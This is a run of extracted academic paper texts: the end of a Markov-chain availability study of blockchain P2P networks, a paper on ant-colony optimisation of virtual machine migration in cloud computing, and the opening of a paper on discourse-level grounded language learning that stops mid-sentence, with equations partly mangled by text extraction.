components, while "availability" considers the repairability of the network and better reflects the quality of the network. Steady-state availability and instantaneous availability are two characteristic quantities that reflect availability. Therefore, analyzing the steady state availability and instantaneous availability of blockchain P2P network system is an International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 39 important index to evaluate the design of system networking, system stability and maintenance ability. V. MARKOVAVAILABILITY MODELING P2P network system is a complex system, its nodes states are changing at anytime, while the factors causing the change of the state of nodes mainly include hardware and software errors, human errors, natural disasters, malicious attacked, causing serious consequences to the network system, and even causing the entire network paralysis. The probability of occurrence of the first several factors is relatively small, while as an artificial means, the probability of occurrence of malicious attack is very high in the real war environment. A. Markov Chain Model of the System In this paper, the P2P network system targeted is a multi-state Markov repairable system, assuming that its failures are caused by malicious attacks. The system is composed of several network nodes and several repair equipment. The life distribution of each node is , and the repair time after node failure is .All of these random variables are independent of each other, and after the fault node is repaired, its life will be the same as the new node. Multi-state means that the nodes of the network system are damaged by attack, which may break one, two or more nodes; the number of fault nodes is different means the system state is different. In the process of system design, it is usually necessary to chose availability model to describe the availability of the system. The availability model adopted in this paper is the voting system model of take k in n. There are two types of voting system models of take k in n: one is a system of take k good nodes in n, which requires k or more of the n nodes of the system to be normal in order for the system to work normally, which is denoted as k/n[G]. The other kind is the system of take k bad nodes in n, which means that the system cannot work properly if k or more of the n nodes of the system fail, which is denoted as k/n[F][7].This paper chose the second system model. When the fault nodes are less than k, the system works normally and repairs the fault nodes. When there are k node failures, the system will fail. At this time, the remaining normal working nodes will also stop working and will not fail. The system will work again until one node under repair is repaired and there are less than k nodes under repair. The system studied in this paper simplifies the actual situation, the n nodes of the system are considered to be one type of node. For example, because the importance of each node is different in practice, the life distribution and repair time of the node may be different, so the node types are not all the same. Another example is that when a node fails, its workload must be borne by other nodes, thus accelerating the loss of other nodes. Therefore, these idealized conditions are temporarily listed as assumptions, called the basic type for analysis. The number of fault nodes in the system is defined as the state of the system, i.e. * + where the working states of the system are * + obviously, the working quality (quality of service) of the different working nodes included in these working states is different, but it is not differentiated in the basic type analysis, and all of them are considered as normal working. X(t)=j indicates that there are j node faults in the system at time t that need to be repaired, i.e. it is in the state of j, where * +. Node life and maintenance time obey the exponential distribution, according to the above, can prove to be time continuous multi-state time homogeneous Markov chain, state transition probability in △t time is shown in the following Formula (3). represents the probability that the system is in state j at time t. This is the Markov model of P2P network multi-state repairable system. The state transition probability diagram of the system is shown International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 40 in Figure 3: (the state of transition to itself is not shown in the figure)                     t)o(t)(P , 1)k-(nt)(P 1k-1,k-n k-n,1,2,jt),o(tj-tj)-(nt)(P 1jj, 1k-n,1,2,jt),o(tjt)(P 1jj, k-n,0,1,jt),o(tj)-(nt)(P 1jj, kj n       (3) 1 2 n-k n-k+1...0 nλ t (n-1)λ t kλ μ t 2μ t (n-k+1)μ Figure 3. State transition diagram The state transition probability matrix is represented by A, as follow:                     1)k-(n-1)k-(n kk-n-k-k-n 2-2)-(n-2 -1)-(n- nn- ）（）（  (4) B. Steady-State Availability of the System Steady-state availability is one of the reliability characteristics of markov repairable system, which means the proportion of the whole running time of the network without dismemberment when the network reaches the steady-state, it is the probability of the network being connected. This index is essentially the probability of connectivity at any time in the steady state. According to the properties of homogeneous Markov process: ( ) ( ) (5) According to formula (5), we get ∑ (6) Where is the probability distribution vector of state in steady state, ( ) , Matrix A is substituted into Equation (6), and we get                          0 1 )1( 0 2 )2( 1 ))1()1(()( 0 3 3 2 )2)2(( 1 0 2 2 1 ))1(( 0 0 00      kn kn kn k j j j jjn j jn nn nn n   (7) The value can be obtained by solving the linear equations, and the steady-state availability of the system is ∑ (8) C. Instantaneous availability of the system Instantaneous availability is also one of the reliability characteristics of markov repairable system. For some high-reliability systems like P2P networks, it takes a long time to reach their stable state, and the steady-state availability may also be disturbed during the system operation. Therefore, it is not enough to calculate the steady-state availability, but to consider the instantaneous index of the system. From the C-K equation, we can obtain that the instantaneous probability is:          0)0(,,0)0(,1)0( )()(t k10 rjirij PPP t P s P S P  (9) The intuitive meaning of the C-K equation is start from state i and arrive at state j after s+ttime, and must first arrive at any state r after s time, and then transfer International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 41 from state r to state j after t time. ( ) ( ) ( ) means that has a probability of 1 and the other states have a probability of 0 at the initial moment. Equation (9) is expressed as a matrix differential equation in the following form: { ( ) ( ) ( ) (10) ( ) = ( ) ( ) ( ) represents the distributed probability of the system in various states at time t, is the row vector, and is also a one-dimensional matrix. ( ) represents the derivative matrix of instantaneous probability of the system at time t This is a system of first order linear differential equations, the general form of its solution is: ( ) ( ) ( ) ∑ (11) Since P and A are matrices, it is difficult to find the analytic expression of the above equation, we can use the Laplace transform to find A simpler expression, and let ∗𝑗(𝑠) ∫ 𝑗( ) 𝑠 𝑑 𝑠 , The Laplace transform of Formula (10) simplifies to ∗(𝑠) ∫ 𝑗( ) 𝑠 𝑑 ( )( ) 𝑠 (12) Where I is the identity matrix, ( ) can be obtained by inverting transform ∗( ) , then the instantaneous availability of the system is ( ) ∑ 𝑗( )𝑗 (13) However, it is difficult to obtain analytic expressions by ∗( ) inverse transformation. Results can be obtained by means of calculation tools, such as Matlab, Maple and other scientific calculation software. VI. EXAMPLES VALIDATE Take Figure 2 as an example, the number of network nodes is 6, and the minimum number of network nodes that can work normally is 4, that is4/6[F] voting system. According to Equation (7), steady-state availability i π of each state is obtained, and then according to Equation (8), steady-state availability A of the network system is obtained. Table 1 is for steady-state availability of each states and the system when μ=0.5 hours and λ =2000 hours, Table 2 is for steady-state availability of each states and the system when μ=0.5 hours and λ =500 hours, and Table 3 is for steady-state availability of each states and the system when μ=1 hours and λ =100 hours. TABLE I. STEADY-STATE AVAILABILITY CALCULATION RESULTS 1 steady-state availability 0.9985013113  1 0.001497752142  2 0.0000009362705703  3 0.0000000002535257376 A 0.9999999997 TABLE II. STEADY-STATE AVAILABILITY CALCULATION RESULTS2 steady-state availability 0.9880833998  1 0.01185708958  2 0.00005937422712  3 0.0000001284512973 A 0.9999998637  0  0 International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 42 TABLE III. STEADY-STATE AVAILABILITY CALCULATION RESULTS 3 steady-state availability 0.9420286502  1 0.05653222481 π2 0.001423815141  3 0.00001530938621 A 0.9999846902 As can be seen from Table 1, 2 and 3, As can be seen from Table 1, 2 and 3, the probability of is the largest, and the probability of and are very small, even negligible. Table 4 is the steady-state availability of a different μ and lambda system. Figure 1 is the curve trend diagram of Table 4, a more intuitive reflection of how steady-state availability varies with μ and λ TABLE IV. STEADY-STATE AVAILABILITY CALCULATION RESULTSOF THE SYSTEM 2000 500 100 2.5 0.9999999609 0.999996172 0.9988771093 1.5 0.9999999928 0.9999994802 0.9999020658 1 0.9999999979 0.9999998637 0.9999846902 0.5 0.9999999997 0.9999999837 0.9999979543 Figure 4. Steady-state availability trend diagram In Table 4, the upper parameter is the node average failure parameter λ, the left parameter is μ. The x-coordinate of Figure 4 is the average node failure parameter λ, the y-coordinate is steady-state availability, and the four different curves are the average node repair time μ. As can be seen from Table 4 and Figure 4, under the Markov model, the steady-state availability of the system is very high, close to 1. The larger the λ, the smaller the μ, the more stable the system can be, which is consistent with the changing rules of P2P networks. According to the analysis of 5.3, P2P network availability cannot be fully reflected by calculating steady-state availability. Therefore, we also need to calculate the instantaneous availability of the system, and calculate the instantaneous availability of the system according to Equations (12) and (13) with the parameters used in Table 1. The results are shown in the following Figure 5. In Figure 5, the horizontal axis is time and the vertical axis is instantaneous availability. Since k=4, there are four curves in the instantaneous curves of multiple states, corresponding to and respectively. In order to make the graph more intuitive to reflect the change of the curve, the graph is divided into two parts, the left one are , and ， with the vertical coordinate of 0 to 0.004, and the right one is , with the vertical coordinate of 0.996 to 1. When four nodes fail, the entire network system is down and the network is unavailable. From the figure, we can see that i.e. the zero nodes that are damaged gradually decrease from probability 1, and become stable after reaching a certain time point. The instantaneous availability of is very high, which is close to 1 indefinitely. While the instantaneous availability of other states is relatively small, gradually increases with time until it becomes stable, while the instantaneous availability of and are very small, approaching 0 infinitely. It can be seen that the probability of system failure is very  0 International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 43 small. Figure 5. Instantaneous availability graphs of multiple states VII. CONCLUSION For P2P networks, the discrete time Markov chain method is used to establish a model of state transition in P2P networks in this paper, and the repairability of network nodes is considered. The calculation formulas of steady-state availability and instantaneous availability are given by using the model, and the results of the above calculation are obtained. The results are compared with the changing rules of the network system, which conforms to the availability requirements of the P2P network. It shows that this model has certain reference value in the availability test of tactical P2P network. REFERENCES [1] Lianhong Zhou. Availability of fiber optic systems[J].Tsinghua Univ (Sci& Tech).2002.01 [2] Fenghua Xie. Modular UPS reliability calculation and analysis[J].Fuzzy Systems & Mathematics, 2002. [3] Jingle Zhang. Availability Analysis of Flexible Workflow Based on Stochastic Petri Net[J].Computer Engineering.2010.11 [4] Jikun Yang. Reliability and Availability Analysis of Missile Weapon System Based on Fuzzy Bayesian Theory[J]. Journal of Naval Aeronautical and Astronautical.2013 [5] Qifeng Shao. Block chain: Architecture and Research Progress[J].Chinese Journal of Computers. 2018,41(5):769-788 [6] Antonopoulos A M. Mastering Bitcoin ： Unlocking Digital Cryptocurrencies[M].California：O’Reilly Media，2014：137-172. [7] Yongnian Wang. Reliability evaluation of k/n[G] system Availability Analysis of Flexible Workflow Based on Stochastic Petri Net. reliability analysis.2015:1-3 [8] Geng Yan. Markov modeling method for availability of twoitem system under passivation[J].Chinese Journal of Scientific Instrument .2016:1-6 [9] Yinan Jiang. The method of network reliability and availability simulation based on Monte Carlo[J]. ICQR2MSE.2012:1-5 [10] Patrick Wüchner. Queueing Networks & Markov Chains[M].Wiley-Interscience.1998:104-108 [11] Du Haidong. Simulation Assessment of Degradation System Reliability under Imperfect Maintenance[J]. Journal of System Simulation.2018,30(8):2834-2840 [12] Ivanovitch, Silva, Luiz Affonso, Guedes, Paulo, Portugal, et al. Reliability and availability evaluation of Wireless Sensor Networks for industrial applications[J]. Sensors, 2012, 12(1):806-838. [13] Datta A. An overview of codes tailor-made for better repairability in networked distributed storage systems[J]. AcmSigact News, 2013, 44(1):89-105. [14] YUAN Yong. Blockchain: The State of the Art and Future Trends [J]. ACTAAUTOMATICASINICA, 2016, 42(4)481-494 [15] Wenli Zhou. Survey of P2P technologies[J]. Computers Engineering and Design , 2006, 27(1):76-79 [16] Xuelong Wang, Jing Zhang,, et al. Survey on peer-to-peer key technologies[J]. Application Research of Computers, 2010, 27(3):801-805,823. work_cse4s3tt2famra6fdegfcy5mnu ---- 120 International Journal of Advanced Network Monitoring and Controls Volume 02, No.2, 2017 Multi Objective Optimization of Virtual Machine Migration Placement Based on Cloud Computing Sun Hong1,2, Tang Qing1,Xu Liping1 and Chen Shiping1 1University of Shanghai for Science and Technology, Shanghai China 200093, 2Shanghai Key Laboratory of modern optical systems, Shanghai China 200093 Corresponding Author: Sun Hong, University of Shanghai for Science and Technology, 200093, shanghai, China Email:sunhong@usst.edu.cn Abstract. How to improve the resource utilization of the cloud computing system has been one of the key content of the research of the cloud computing. The traditional multi-objective ant colony optimization was improved, studied the virtual machine live migration framework, combined with the elimination method to solve virtual machine migration and placement of multi-objective optimization problem, the load balanced specific strategies are integrated into the framework of a dynamic migration, simulation experiments are carried out and the conclusions are made for it. The algorithm can obtain the optimal solution through the continuous updating of pheromone. The main consideration is the Service level contract violation rate(S), Resource loss(W),Power consumption (P). Experimental results show that ,compared with the traditional heuristic method and genetic algorithm, the algorithm is advantageous to the parallel computation, and it’s able to achieve the optimal tradeoff and compromise between multiple conflicting objectives. In the case of service level contract violation rate is low, system resource waste and power consumption are at the least, so it has feasibility. Keywords: Cloud computing, Virtual machine migration, Multi objective optimization, Ant colony algorithm, Elimination method. 1. Introductiong As a new technology, cloud computing has become a hot research topic in the field of information in recent years. As a new business computing model, business characteristics and virtualization technology is its obvious characteristics. And the task scheduling is the key technology of cloud computing, it not only affects the efficiency of the whole system, but also significantly affects the quality of service. At present, the problem of task scheduling is studied in the grid environment. Due to the diversity of user requirements in the cloud computing system, and the complexity of the task type, previous task scheduling algorithms can’t meet the requirements of the overall QoS. In the dynamic cloud computing environment, improving the efficiency of task scheduling and load balancing is an eternal problem, for users, to meet the user’s QoS requirements is the most important thing. Therefore, the research on the task scheduling algorithm with QoS expectation constraint is the key content of the Multi Objective Optimization of Virtual Machine Migration Placement Based on Cloud Computing 121 cloud computing system. Nowadays, cloud computing has become a new model to provide access and services through the Internet. If the distribution of resources is not reasonable, it will inevitably lead to waste of resources. It is of great significance to realize the multi objective optimization of virtual machine migration and placement in the present stage. Most researchers use the traditional heuristic method or genetic algorithm and other algorithms to make the virtual machine placement before; Although these algorithms can solve the problem of virtual machine migration in a certain extent, but these algorithms have their own limitations. For example, heuristic method can solve the problem of local optimal solution in virtual machine migration, but the method is short of the ability of global optimization. Although genetic algorithm has certain advantages in multi objective optimization, it can’t make full use of the feedback information, so that the search is blind, and the efficiency of solving the optimal solution to a certain extent is relatively low. ant colony optimization, which also called ant algorithm, is a kind of probabilistic algorithm used to find the optimal path in the graph. Ant colony optimization is a simulated evolutionary algorithm, a preliminary study shows that the algorithm has many excellent performance. Compared with the results of genetic algorithm design, numerical simulation results show that ant colony algorithm has a new simulation evolutionary optimization method and its effectiveness and application value. This paper introduces the management framework of the two layers of local management and global management, through this management framework is conducive to the migration of virtual machine placement and resource allocation to make better decisions. The method used in this paper is to improve the traditional ant colony algorithm, and combine with the exclusion method. It is advantageous to the parallel computation, and the efficiency is higher. To be able to obtain the optimal tradeoff between the three conflicting objectives which are service level contract violation rate(S),resource loss(W) and power consumption(P),and in the case of service level contract violation rate is low, the waste of system resources and power consumption are the least. 2. Overall Framework for Virtual Machine Migration 2.1 Virtual machine migration Xen virtual machine is using virtualization technology which is a quasi virtualization technology, and have good performances in all kinds of architecture, it has very good performance and system isolation. Up to now, Xen is definitely the most outstanding Linux system under the open source virtual machine, Xen is now no longer originally just supported by x86, and now has wild support and even Itanium and other hardware platforms are available to it. Version 4 was released in 2010, the client can support up to 64 virtual CPU. To use a virtual machine, you should start the operating system, but Microsoft platform VMware is the first to enable the physical machine system and then start the process, and this is not the standard. After Xen started, the first step is to run the virtual machine monitor, which is Xen Hypervisor (also known as the super management program in the Xen system), then run the host operating system (or local operating system),by minimizing the connection between the super manager and the native operating system, it reduces the risk of super management program itself and the virtual machine being destroyed and information leakage. 2.2 Overall framework and optimization of virtual machine migration The basic migration structure is implemented by four modules, including migration monitoring, execution migration, suspension and rewake. As shown in Figure 1. 122 International Journal of Advanced Network Monitoring and Controls Volume 02, No.2, 2017 Monitor migration module: The primary function of the primary module is to determine the source of the migration, the start time of the migration, and the purpose of the migration. The working mode of listening and migrating module is determined by the purpose of migration. In order to ensure the load balance of each node, setting up the monitor signal in the virtual machine management program, according to the monitoring of the various nodes of the load operation to determine whether the need to migrate. Set a migration threshold, when monitor to arrive at this value, monitor migration module will send a migration signal to the source, indicates that the source machine will be migrated. Meanwhile, monitor the migration module to communicate with other nodes, look for the lower load nodes, and determine the specific location of the destination machine. Run migration module: This module is the most important module of virtual machine migration, almost bear most of the migration work. After running the migration, this module collects the running information of the source machine, at the same time to freeze the module by sending the “frozen” signal to the source machine. This process is the key part of the migration process, directly affect the migration process downtime and migration of the total length. Freezing module: This module is mainly responsible for how to solve the continuous service problem. It makes users feel not interruptions. Target domain wake-up module: The function of the target domain wake-up module is to determine the time to wake up the destination machine, also ensure that the weaken target machine is consistent of the source machine, and how to ensure that the service of the target area is connected with the source area. After it shutdown, the running module will copy the remaining memory pages, then send the “weaken signal” to the weaken module which on the target machine. Interrupt connection device is a direct consequence caused by shutdown, peripheral device cannot connect to virtual machine, this, of course, will cause the external service is not timely or appear all kinds of transmission errors. In order to improve the effectiveness of migration, reduce the time of shutdown, increase the application rate of load, we propose an optimized virtual machine dynamic migration framework, this framework is also based on Xen. Figure.1 The virtual machine dynamic migration placement module Multi Objective Optimization of Virtual Machine Migration Placement Based on Cloud Computing 123 In order to improve the utilization of load, at the same time, it also makes the migration process more smooth and effective, optimization the design of dynamic migration of Xen virtual machine. Add two modules to achieve load balancing, one of them is the load monitor module, which add to the original monitor migration module, in order to set the identity of the current virtual machine running information, set the trigger conditions for its migration and prepare for the subsequent migration to select the appropriate load; the other one load transfer module is mainly responsible for the positioning and selection strategy of the virtual machine migration. As shown in Figure 2, three modules are marked by grey patterns. Figure.2 Dynamic migration of virtual machine placement framework optimization module 3. Virtual Machine Migration Placement Policy Model A large number of computers will be integrated into resource pool in the cloud computing, then the computing tasks in cloud computing are distributed in the resource pool, all applications can each one takes what he needs, for example, you can have a stronger computing power to meet the needs of computing, you can set aside a larger storage space to store resources, and even more perfect online updates and other software services. In the cloud computing platform, a variety of servers to complete a specific task by way of collaboration. Because there is no unified standard for cloud computing platform application interface, the application of the various cloud environments can not be fully integrated, at the same time, the resources of the nodes in the cloud environment are different. For example, the formats provided by the same resource are different, the demands for resources in different time periods are different, there are large number of access to the same node during certain periods of time. This will lead a overload caused by excessive access on a server node in a certain period of time. While the other nodes are less load due to access relatively light, this forms the node utilization rate is not high in the whole system, causing the load is not balanced. Virtualization technology continues to mature, this is to provide a solution to this. The emergence of dynamic migration of virtual machine is an effective way to solve the load imbalance. The whole virtual machine running state can smooth and stable mutual transfer between the two physical hosts in the same cluster, of course, this is the necessary conditions for the transfers, and users don’t have any feeling of stagnation. The dynamic migration of virtual machine can assist the maintenance personnel of the cloud environment, so that the nodes in the cluster can be fully used, achieve load balancing dynamically. Therefore, to improve the resource allocation in the cloud environment and to strengthen the system by designing an efficient load balancing algorithm, 124 International Journal of Advanced Network Monitoring and Controls Volume 02, No.2, 2017 this has become one of the important issues in the field of cloud computing. Virtual machines allow all computing tasks to encapsulate into the virtual machine. Because the virtual machine is one of the characteristics of isolation, so you can use the virtual machine dynamic migration technology to migrate computing tasks. The scale of cloud computing is generally relatively large, it also provide the same size of the pressure to how to adjust the distribution of the node resources. Considering the real time information of resources in cloud environment, resource scheduling must be done, this requires real- time monitoring of resources in the cloud environment, and can dynamically manage. From the point of view of the process size of the task to be migrated, cloud computing users pay more attention to the migration process in the virtual machine itself how to operate, of course, the premise is to try not to affect the user. How to provide resources to the service level agreement of the internal application of the virtual machine is a problem to be solved at present. In terms of practical ability, resource scheduling system must monitor the usage of resources and provide reference for the system itself in time, or for system management related personnel to set. 3.1 Virtual machine management framework The number of infrastructure nodes in cloud computing is very large, which makes it very difficult to build a structure. The management framework of this paper is two layers of management, local management and global management, the details are shown in Figure 3.The management of host cloud infrastructure to enable global management to run on a host node, by monitoring the collection of various information from local management, including user service quality resource consumption and power consumption, and so on, then make decisions on the placement of the virtual machine and the allocation of resources. Figure.3 Virtual machine system management structure 3.2 Mathematical model of virtual machine migration The migration and placement of virtual machine has been the focus of research in cloud computing, it is a typical bin packing problem. The literature proves that the virtual machine migration is a NP-hard problem. According to the framework of system management in Figure 3, in this paper, we need to consider the following 3 factors in the global management of virtual machine initialization: service level contract violation rate(S), resource loss(R), power consumption(P). m, n, respectively, indicating the Multi Objective Optimization of Virtual Machine Migration Placement Based on Cloud Computing 125 number of physical nodes and virtual machines, says j-th physical nodes have a corresponding resource capacity, represents the resource capacity of the request of i-th virtual machines. Its mathematical model is described as follows: target: (1) constraint： 1 , [1, , ] n CPU CPU i ij j i r a c j m = ⋅ < =∑  (2) 1 , [1, , ] n mem mem i ij j i r a c j m = ⋅ < =∑  (3) 1 , [1, , ] n bw bw i ij j i r a c j m = ⋅ < =∑  (4) 1 1, [1, , ] m ij j a i n = = =∑  (5) The three objectives of the formula (1) are service level contract violation rate (S), resource loss (R), and power consumption (P). Formula (2-4) constrains the allocation of CPU, memory and network bandwidth resources on each physical node, which will not exceed the capacity of its own. And formula (5) constrains each virtual machine can only be assigned to a physical node. 4. Multi Objective Optimization Virtual Machine Migration Placement Strategy Based on Ant Colony Algorithm Ant colony algorithm is a kind of technology that can be used to find the optimal solution. The algorithm is widely used in the virtual machine migration and placement problem, and has certain advantages in dealing with combinatorial optimization problems. The following is the specific design steps and process of this article. 4.1 Fitness function The selection of the stress function is very important in the genetic algorithm. According to the formula (1), the 3 sub - suitability function is defined, the value of the range is between [ ]0 1 SLA violation rate function（ SLAf ）,resource utilization function（ resourcef ）,power consumption function（ powerf ）, Such as formula (6) - (7). 0.9 1 ( ) 1 CPUSLA CPU u f u e − = + (6) ( , , )resource CPU mem bw CPU mem bwf u u u u u u= × × (7) ( ) ( ) CPU power CPU busy idle busy idle CPU u f u P P P P u = × + − × (8) In the formulas, CPUu 、 memu 、 bwu 、 busyP indicate the CPU, memory, network bandwidth utilization and multiplier factor respectively on the physical node . powerf reflects the amount of effective work in a certain amount of power consumed. 126 International Journal of Advanced Network Monitoring and Controls Volume 02, No.2, 2017 Taking into account the need to balance the service level contract violation rate (S), resource loss (R), power consumption (P) 3 goals. So the weight value of this paper are set to 1, and according to the experience in this definition the suitability function is ( , , ) ( ) ( , , ) ( ) CPU mem bw SLA CPU resource CPU mem bw power CPU f u u u f u f u u u f u = + + (9) 4.2 Pheromone pheromone update rules as shown in formula (10) - (11) ( )1 bestiu iu iuγ ρ γ γ= − × + ∆ (10) iu is loaded on the node u( ), 0, others bestbest JVMf Sγ  =    (11) In the formula, bestS is the optimal solution set, ρ is the pheromone volatile coefficient, bestiuγ∆ is the pheromone increment, ( )bestf S is the appropriate degree function. 4.3 Probability transfer function Probability transfer function ( ) ( ) ( ) ( )P ( ) 0 iu iu k iu iuiu k Seallowed t t t tt i allowed α β α β γ η γ η  ×  ×= ∈   ∑ ， (12) In the formula, is an information heuristic factor, is the visibility heuristic factor. Among them, the gamma _i^CPU, gamma _i^mem, gamma _i^bw are virtual machine I request CPU, memory and network bandwidth of the corresponding resources on the host node u ratio. 4.4 The construction of the optimal solution set Using the exclusion method to construct the non dominated set is a common method in multi-objective genetic algorithm. In this paper, we use the rule of law and its appropriate improvements to deal with the solution of the ant colony algorithm search process, which can be used to build the Paxeto solution set, the process is as follows: Step1:Set the solution set { }1 2, ,cycle nD D D D∗ =  for a loop search, where n is the number of the solution to the search. Step2:To evaluate each solution vector has 3 sub goals, if iD target is better than jD corresponding to other sub goals and sub goals, iD and jD were compared to non inferior, concludes that iD dominated jD , jD must be removed from the current set of solutions of C, and vice versa. Step3：And so on, will the solution cycleD∗ were compared with each other, to get the optimal solution set cycleD ∗ of cycles. Multi Objective Optimization of Virtual Machine Migration Placement Based on Cloud Computing 127 Step4：The cycleD∗ and the global optimal solution set bestD are compared according to the exclusion method, and the final non dominated solution is saved to the bestS . Step5：To continue the cycle, when the cycle is over, the global optimal solution set bestD is the Pareto optimal solution set. 5. Experimental Results and Analysis This experiment is done on the C1oudSim[6], cloudsim by Rajkumar professor Buyya team (Melbourne University) developed cloud computing simulator, Melbourne University in Australia Grid Laboratory and Gridbus project announced the launch of cloud computing simulation software. CloudSim as a generic, scalable new simulation framework that supports seamless modeling and simulation, and can be carried out on the basis of cloud computing infrastructure and management services. This simulation framework has the following characteristics[7]: Simulation and example of a large-scale cloud infrastructure supporting a single physical computing node. To provide an independent platform, the main function is to the modeling of the data center, service agent and scheduling strategy. In a data center node to provide a virtual engine, to manage the independent virtualization services. Flexible virtualization services can switch between shared space and shared time processing core allocation policies. In this paper, we use ant colony algorithm for resource allocation, and some other algorithms are compared. Experiment set 80 physical nodes, each node is configured for GB l0 memory, 1TB storage and bandwidth of 1 Gbps, while the capacity of CPU is equivalent to 1000, 2000 and 3000 MIPS. The number of requests for a virtual machine is 200, where the request for CPU is 250500750 and 1000 MIPS, 4 GB memory, 200, GB bandwidth, 200 Mbps. The power consumption of the physical node in CPU utilization is 0% and 100%, respectively. The power consumption is 175W and 250W. Figure.4 Comparison of SLA violation rate and resource waste in 6 placement algorithms 128 International Journal of Advanced Network Monitoring and Controls Volume 02, No.2, 2017 Figure.5 Comparison of the fitness function value of 6 kinds of placement algorithms Figure.6 Comparison of 6 placement algorithms under power consumption 6. Concluding Remarks The algorithm used in this paper is an improved ant colony algorithm for distributed multi objective optimization. This algorithm is an improvement of the traditional multi objective ant colony algorithm. Selected service level contract violation rate (S), resource consumption (W), power consumption (P) three targets. And combined with the elimination method to solve the virtual machine migration in the placement of these three objectives optimization problem. Experimental results show that compared with the traditional heuristic method and genetic algorithm, the proposed algorithm can effectively reduce the resource waste and the power consumption of the system when the service level contract violation rate is low, and it has feasibility. This paper has used the power consumption as one of the management objectives, next, we also need to consider how to take into account the data center network traffic and other aspects, so as to achieve more perfect. References [1] HYEAR C,MCKEE B, GARDNER R, et al. Autonomic virtual machine placement in the data center [J]. Hewlett Packard Laboratories, Tech. Rep. HPL-2007-189, 2007:2007-189. [2] Li Jingchao,ChenJingyi,WuJie. Research on virtual machine placement based on improved grouping genetic algorithm [J]. Computer engineering and design,2012,33(5):2053-2056.. [3] Li Yong: Analysis and Research on dynamic migration of virtual machine[Dissertation]. National Defense Multi Objective Optimization of Virtual Machine Migration Placement Based on Cloud Computing 129 Science and Technology University,2007. [4] Li Zhiwei,WuQingbo,TanYusong. Research on dynamic migration of virtual machine based on device agent mechanism. Computer application research. Twenty-sixth volumes, April 2009. [5] CAREY M R，JOHNSON D S. Computers and ln tractability: a guide to NP-completeness [J].1979. [6] CALHEIROS R N, RANJAN R, ct al. Cloud Sim: a toolkit for modeling and simulation of cloud computing environments and evaluation of resource provisioning algorithms [J]. Software: Practice and Experience, 2011, 41(1): 23-50. [7] Sun Hong, Zhang Huaxuan, Chen Shiping, etal. The Study of Improved FP-Growth Algorithm in Map Reduce[C].//Proc.CPCI- 1st International Workshop on cloud Computing and Information Security(CCIS) 2013 CPCI:00033591040005 Acknowledgements This work was supported by the National natural Science Foundation of China (No.61472256, No.61170277), Innovation Program of Shanghai Municipal Education Commission(No.12zz137), and the Hujiang Foundation(C14002). Biographies Sun Hong: female, Han, 1964-, from Beijing, China, Master, associate professor, School of Optical- Electrical and Computer Engineering University of Shanghai for Science and Technology, master tutor, associate professor direction of research; Business schools University of Shanghai for Science and Technology doctor graduate student; the main research direction: computer network communication and clouds computing, management science and engineering, Management Information and Decision Support System . Email:sunhong@usst.edu.cn,Telephone:13916902800 Tang Qing: male, han, 1993-, master student, School of Optical-Electrical and Computer Engineering University of Shanghai for Science and Technology; the main research direction: cloud computing and management information system.Email:qingtang1993@163.com Xu Li-ping: female, han, 1986-, master, associate professor, University of Shanghai for Science and Technology; the main research direction: cloud computing and management information system. Email:5850487@qq.com Chen Shi-Ping: male, han, 1964-,form Zhejiang, China, professor, Ph.D., doctoral tutor Business schools University of Shanghai for Science and Technology, research direction: computer network communication and clouds computing, management science and engineering. Email:chensp@usst.edu.cn work_ctayywu6gfdgbowc6nbcvpyjoe ---- Parsing entire discourses as very long strings: Capturing topic continuity in grounded language learning Minh-Thang Luong Department of Computer Science Stanford University Stanford, California lmthang@stanford.edu Michael C. Frank Department of Psychology Stanford University Stanford, California mcfrank@stanford.edu Mark Johnson Department of Computing Macquarie University Sydney, Australia Mark.Johnson@MQ.edu.au Abstract Grounded language learning, the task of map- ping from natural language to a representation of meaning, has attracted more and more in- terest in recent years. In most work on this topic, however, utterances in a conversation are treated independently and discourse struc- ture information is largely ignored. In the context of language acquisition, this indepen- dence assumption discards cues that are im- portant to the learner, e.g., the fact that con- secutive utterances are likely to share the same referent (Frank et al., 2013). The current pa- per describes an approach to the problem of simultaneously modeling grounded language at the sentence and discourse levels. We com- bine ideas from parsing and grammar induc- tion to produce a parser that can handle long input strings with thousands of tokens, creat- ing parse trees that represent full discourses. By casting grounded language learning as a grammatical inference task, we use our parser to extend the work of Johnson et al. (2012), investigating the importance of discourse con- tinuity in children’s language acquisition and its interaction with social cues. Our model boosts performance in a language acquisition task and yields good discourse segmentations compared with human annotators. 1 Introduction Learning mappings between natural language (NL) and meaning representations (MR) is an important goal for both computational linguistics and cognitive science. Accurately learning novel mappings is cru- cial in grounded language understanding tasks and such systems can suggest insights into the nature of children language learning. Two influential examples of grounded language learning tasks are the sportscasting task, RoboCup, where the NL is the set of running commentary and the MR is the set of logical forms representing ac- tions like kicking or passing (Chen and Mooney, 2008), and the cross-situational word-learning task, where the NL is the caregiver’s utterances and the MR is the set of objects present in the context (Siskind, 1996; Yu and Ballard, 2007). Work in these domains suggests that, based on the co- occurrence between words and their referents in context, it is possible to learn mappings between NL and MR even under substantial ambiguity. Nevertheless, contexts like RoboCup—where ev- ery single utterance is grounded—are extremely rare. Much more common are cases where a sin- gle topic is introduced and then discussed at length throughout a discourse. In a television news show, for example, a topic might be introduced by present- ing a relevant picture or video clip. Once the topic is introduced, the anchors can discuss it by name or even using a pronoun without showing a picture. The discourse is grounded without having to ground every utterance. Moreover, although previous work has largely treated utterance order as independent, the order of utterances is critical in grounded discourse contexts: if the order is scrambled, it can become impossible to recover the topic. Supporting this idea, Frank et al. (2013) found that topic continuity—the tendency to talk about the same topic in multiple utterances that are contiguous in time—is both prevalent and informative for word learning. This paper examines the importance of topic continuity through a gram- matical inference problem. We build on Johnson et al. (2012)’s work that used grammatical inference to �� Figure 1: Unigram Social Cue PCFGs (Johnson et al., 2012) – shown is a parse tree of the input utterance “wheres the piggie” accompanied with social cue prefixes, indicating that the caregiver is holding a pig toy while the child is looking at it; at the same time, a dog toy is present in the screen. learn word-object mappings and to investigate the role of social information (cues like eye-gaze and pointing) in a child language acquisition task. Our main contribution lies in the novel integra- tion of existing techniques and algorithms in parsing and grammar induction to offer a complete solution for simultaneously modeling grounded language at the sentence and discourse levels. Specifically, we: (1) use the Earley algorithm to exploit the special structure of our grammars, which are deterministic or have at most bounded ambiguity, to achieve ap- proximately linear parsing time; (2) suggest a rescal- ing approach that enables us to build a PCFG parser capable of 